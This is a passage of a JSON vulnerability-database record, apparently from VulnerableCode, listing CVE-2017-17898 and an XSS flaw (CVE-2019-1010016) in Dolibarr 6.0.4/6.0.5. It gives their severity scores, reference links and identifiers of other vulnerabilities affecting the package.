information.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-17898","reference_id":"","reference_type":"","scores":[{"value":"0.00258","scoring_system":"epss","scoring_elements":"0.49349","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-17898"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/4a5988accbb770b74105baacd5a034689272128c","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/4a5988accbb770b74105baacd5a034689272128c"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/6a62e139604dbbd5729e57df2433b37a5950c35c","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/6a62e139604dbbd5729e57df2433b37a5950c35c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-17898","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-17898"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/98317?format=json","purl":"pkg:composer/dolibarr/dolibarr@6.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3spa-q7qf-suez"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-9v1w-ayuw-wbhy"},{"vulnerability":"VCID-bdx3-aeus-qkh7"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-jrxu-cz7p-3uhe"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-u1mx-ymsz-wqa2"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-vhht-9j9w-5bhr"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-w8pm-m6yc-5bfb"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-y9z1-u3rc-yub6"},{"vulnerability":"VCID-yrys-ch5x-23bv"},{"vulnerability":"VCID-zve5-afaq-mkh8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@6.0.5"}],"aliases":["CVE-2017-17898","GHSA-jm38-vmgp-j7rx"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-uthw-1ze2-3qdc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/57963?format=json","vulnerability_id":"VCID-z355-geu8-4qby","summary":"Dolibarr Cross Site Scripting (XSS)\nDolibarr 6.0.4 is affected by: Cross Site Scripting (XSS). The impact is: Cookie stealing. The component is: htdocs/product/stats/card.php. The attack vector is: Victim must click a specially crafted link sent by the attacker.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-1010016","reference_id":"","reference_type":"","scores":[{"value":"0.00199","scoring_system":"epss","scoring_elements":"0.41909","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-1010016"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/issues/7962","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/issues/7962"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-1010016","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-1010016"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/98317?format=json","purl":"pkg:composer/dolibarr/dolibarr@6.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3spa-q7qf-suez"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-9v1w-ayuw-wbhy"},{"vulnerability":"VCID-bdx3-aeus-qkh7"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-jrxu-cz7p-3uhe"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-u1mx-ymsz-wqa2"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-vhht-9j9w-5bhr"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-w8pm-m6yc-5bfb"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-y9z1-u3rc-yub6"},{"vulnerability":"VCID-yrys-ch5x-23bv"},{"vulnerability":"VCID-zve5-afaq-mkh8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@6.0.5"}],"aliases":["CVE-2019-1010016","GHSA-97fp-5m87-r9mf"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-z355-geu8-4qby"}],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@6.0.5"}